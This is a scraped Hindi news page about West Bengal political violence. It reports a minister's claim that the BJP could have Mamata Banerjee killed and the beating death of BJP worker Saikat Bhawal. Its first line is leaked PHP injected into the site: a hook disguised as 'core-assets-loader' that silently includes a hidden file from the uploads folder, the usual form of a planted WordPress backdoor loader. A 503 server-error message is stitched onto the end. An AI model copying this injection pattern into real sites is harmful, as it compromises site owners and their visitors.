add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बंगाल: सुब्रत मुखर्जी का बड़ा बयान- ‘बीजेपी चुनाव हार गई तो ममता बनर्जी की हत्या करवा सकती है’ – SOCH INDIA
Menu

देश
बंगाल: सुब्रत मुखर्जी का बड़ा बयान- ‘बीजेपी चुनाव हार गई तो ममता बनर्जी की हत्या करवा सकती है’

nobanner

पश्चिम बंगाल में बीजेपी के एक और कार्यकर्ता की हत्या हो गई है. बीजेपी हत्या के लिए तृणमूल कांग्रेस पर आरोप लगा रहे हैं. वहीं ममता सरकार के मंत्री का कहना है कि अगर बीजेपी विधानसभा चुनाव में नहीं जीती तो ममता बनर्जी की हत्या करा सकती है. सुब्रत मुखर्जी ने कहा, ‘अगर बंगाल में बीजेपी चुनाव हार गई, तो ममता बनर्जी की हत्या की साजिश रच सकती है बीजेपी.’
मुखर्जी ने कहा, ‘मैं आपको बता रहा हूं.. ये लोग किसी दिन ममता बनर्जी की हत्या करवा देंगे. हत्या करवा देंगे और दोष किसी और पर मढ़ देंगे.’
बीजेपी कार्यकर्ता की पीट-पीट कर हत्या
पश्चिम बंगाल के उत्तरी 24 परगना जिले में शनिवार को बीजेपी द्वारा घर-घर जाकर प्रचार करने के दौरान पार्टी कार्यकर्ताओं पर लोगों के एक समूह ने हमला कर दिया. पार्टी के एक कार्यकर्ता की पीट-पीट कर हत्या कर दी गई, जबकि घटना में छह अन्य घायल हो गए. पुलिस ने बताया, हालीशहर क्षेत्र में जिनपर हमला किया गया उसमें सैकत भवाल नाम का एक व्यक्ति भी शामिल था. जब भवाल को कल्याणी स्थित जेएनएम अस्पताल ले जाया गया, तो डॉक्टरों ने उसे मृत घोषित कर दिया. मामले की जांच की जा रही है.
हालीशहर नगर निकाय के वार्ड संख्या छह में हुए हमले में छह अन्य लोग घायल हो गए, जिन्हें अस्पताल में भर्ती कराया गया है. बैरकपुर से भाजपा सांसद अर्जुन सिंह ने आरोप लगाया कि तृणमूल कांग्रेस के गुंडों ने भवाल की हत्या कर दी. हालांकि राज्य में सत्तारूढ़ दल ने इन आरोपों से इनकार किया है.
नैहट्टी से तृणमूल कांग्रेस विधायक पार्थ भौमिक ने कहा कि भवाल की मौत क्षेत्र के दो गुटों के बीच पुरानी रंजिश का परिणाम है और भाजपा बेवजह मामले को राजनीतिक रंग दे रही है. बैरकपुर पुलिस आयुक्तालय के संयुक्त आयुक्त अजय ठाकुर ने कहा कि घटना के संबंध में दो व्यक्तियों को हिरासत में लिया गया है और उनसे पूछताछ की जा रही है.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.